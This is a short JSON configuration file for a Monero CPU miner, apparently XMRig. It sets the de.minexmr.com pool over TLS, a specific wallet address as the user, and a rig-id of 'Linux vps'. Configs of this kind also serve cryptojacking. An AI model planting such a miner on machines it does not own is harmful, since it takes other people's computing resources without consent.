{
    "autosave": true,
    "cpu": true,
    "opencl": false,
    "cuda": false,
    "pools": [
        {
            "url": "de.minexmr.com:443",
            "user": "44ZV6pGCdx78L4yUEK82ZuY8rejDXyC84eRkQpquFWVgSxRfbLgttKX16EwzvbuJNH3Bj2XstgsVHQcs2c38X1661BPxPTd",
            "rig-id": "Linux vps",
            "keepalive": true,
            "tls": true
        }
    ]
}
